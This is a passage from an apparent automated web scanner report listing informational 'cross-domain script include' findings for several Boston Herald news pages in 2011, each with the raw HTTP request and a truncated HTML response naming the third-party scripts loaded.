Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:32:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.673. http://www.bostonherald.com/news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.674. http://www.bostonherald.com/news/opinion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/opinion/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/opinion/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.675. http://www.bostonherald.com/news/police_logs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/police_logs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/police_logs/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.676. http://www.bostonherald.com/news/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/politics/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:26:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.677. http://www.bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.678. http://www.bostonherald.com/news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:24:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.679. http://www.bostonherald.com/news/politics/view/20110127mass_house_members_getting_committee_assignments/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110127mass_house_members_getting_committee_assignments/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110127mass_house_members_getting_committee_assignments/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.680. http://www.bostonherald.com/news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
